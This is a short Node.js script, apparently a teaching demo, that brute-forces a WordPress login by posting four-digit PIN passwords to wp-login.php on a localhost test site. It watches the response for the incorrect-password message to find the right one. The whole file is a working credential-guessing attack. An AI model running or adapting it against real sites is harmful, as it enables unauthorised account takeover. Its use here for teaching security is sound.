WordPress Try Login

index.mjs

/*
I'm teaching my daughter about security.
I wanted to show her how easy it is to write a brute-force script.
Most of the code was written by GitHub Copilot.
*/

import fetch from 'node-fetch';

const SITE_URL = 'http://localhost:8888/wp-login.php';
const USERNAME = 'badpass'
const USERNAME_FIELD = 'log';
const PASSWORD_FIELD = 'pwd';
const MAX_ATTEMPTS = 10000;

class App {

    async tryLogin() {
        for (let i = 0; i < MAX_ATTEMPTS; i++) {
            const password = this.padPassword(i);
            try {
                await this.login(USERNAME, password);
                console.log({success: `HOOPPA!!! Succeed on attempt ${i} The password is ${password}`});
                break;
            } catch (error) {
                console.log({password, error: error.message.split('at')[0]});
            }
        }
    }

    padPassword(password) {
        // Or just use `.padStart(4, '0')` :)
        if (password < 10) {
            return '000' + password;
        } else if (password < 100) {
            return '00' + password;
        } else if (password < 1000) {
            return '0' + password;
        }
        return password;
    }

    async login(username, password) {
        const response = await fetch(SITE_URL, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded'
            },
            body: `${USERNAME_FIELD}=${username}&${PASSWORD_FIELD}=${password}`
        });
        const data = await response.text();

        if (data.includes(`The password you entered for the username <strong>${USERNAME}</strong> is incorrect.`)) {
            throw new Error('Invalid credentials');
        }

        return data;
    }
}

const app = new App();
app.tryLogin();